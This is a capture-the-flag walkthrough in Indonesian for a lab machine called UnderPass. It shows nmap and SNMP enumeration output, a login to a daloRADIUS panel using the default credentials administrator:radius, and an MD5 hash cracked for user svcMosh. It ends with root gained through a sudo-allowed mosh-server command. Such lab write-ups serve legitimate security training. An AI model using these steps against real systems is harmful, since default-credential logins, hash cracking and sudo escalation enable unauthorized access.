UNDERPASS

UnderPass is an easy difficulty machine...

└─$ nmap -sC -sV -sU 10.10.11.48

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-26 02:30 WIB

Nmap scan report for 10.10.11.48

Host is up (0.12s latency).

Not shown: 997 closed udp ports (port-unreach)

PORT STATE SERVICE VERSION

161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)

| snmp-info:

| enterprise: net-snmp

| engineIDFormat: unknown

| engineIDData: c7ad5c4856d1cf6600000000

| snmpEngineBoots: 29

|_ snmpEngineTime: 3h16m03s

| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64

|_ System uptime: 3h16m2.69s (1176269 timeticks)

1812/udp open|filtered radius

1813/udp open|filtered radacct

Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!

┌──(glmx㉿kali)-[~]

└─$ snmpwalk -v 2c -c public 10.10.11.48

iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"

iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10

iso.3.6.1.2.1.1.3.0 = Timeticks: (30064) 0:05:00.64

iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"

iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"

iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"

iso.3.6.1.2.1.1.7.0 = INTEGER: 72

iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01

....

Mencoba akses login.php tetapi tidak ada petunjuk juga.. tetapi diketahui, inilah tempat untuk melakukan login ke managementnya.

Sekarang ditemukan petunjuk baru, yaitu pada app/operators

Setelah akses /operators, kemudian diarahkan di login.php. Beberapa kali menebak kredensial maka yang benar adalah administrator:radius

Berhasil masuk 😁. Dari sini kemudian menuju tab Management => List Users, maka ditemukan username svcMosh dengan password dalam bentuk Hash MD5.

Kemudian melakukan crack MD5 pada situs crackstation dan ditemukan password user svcMosh

Akses user menggunakan kredensial yang telah ditemukan dan berhasil login serta mendapatkan user flag.

Selanjutnya mencari jalan untuk mendapatkan akses lebih tinggi yaitu ROOT

Melakukan pengecekan hak akses yang di berikan kepada user svcMosh. mosh-server dapat dijalankan tanpa menggunakan password untuk akses root.

jalankan mosh --server="sudo /usr/bin/mosh-server" localhost dan berhasil mendapatkan akses root serta root flag.. 😊

Google Sites

Report abuse